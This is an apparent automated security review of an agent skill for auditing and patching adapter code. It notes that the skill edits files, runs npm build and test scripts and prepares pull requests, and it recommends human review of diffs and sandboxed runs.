Adapter Audit
Security checks across static analysis, malware telemetry, and agentic risk
Overview
This instruction-only skill is coherent for auditing adapters, but it directs the agent to edit project files, run project scripts, and create PRs, so users should review changes before publication.
Install/use only if you want an agent to edit adapter code and prepare PRs. Prefer a clean branch, review the generated diff and tests, and approve any PR publication yourself.
Static analysis
No static analysis findings were reported for this release.
VirusTotal
VirusTotal findings are pending for this skill version.
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
The agent could change multiple files and prepare a public or upstream contribution.
The skill asks the agent to modify project source files and create a PR. This is aligned with the stated adapter-audit purpose, but it is still a meaningful mutation workflow.
Apply fixes using the minimum change principle: ... For YAML adapters: add field to return object + map step + columns array ... Create a single well-documented PR
Review the diff and approve the branch/PR content before allowing submission.
If the target repository is untrusted, its build or test scripts could run unwanted code locally.
The skill instructs running local project npm scripts. This is expected for verification, but npm scripts can execute arbitrary project-defined commands.
npm run build # ensure TS compiles npm test # ensure nothing breaks
Run this only in trusted repositories or in a sandboxed environment.
A PR may be created under the user's account or organization membership.
Submitting or preparing upstream PRs commonly uses the user's git hosting identity and repository permissions. The artifact does not show credential collection or storage.
preparing multi-file PRs to upstream projects
Ensure the agent uses the intended account, branch, fork, and repository before publishing.
A reviewer might over-trust the generated risk statement if the changes are broader than expected.
The skill frames the PR risk assessment as always additive. That matches its intended rule to only add fields, but users should verify the actual diff rather than accepting the label automatically.
risk assessment (should always be "additive only")
Confirm that the produced changes are truly additive and do not alter existing behavior.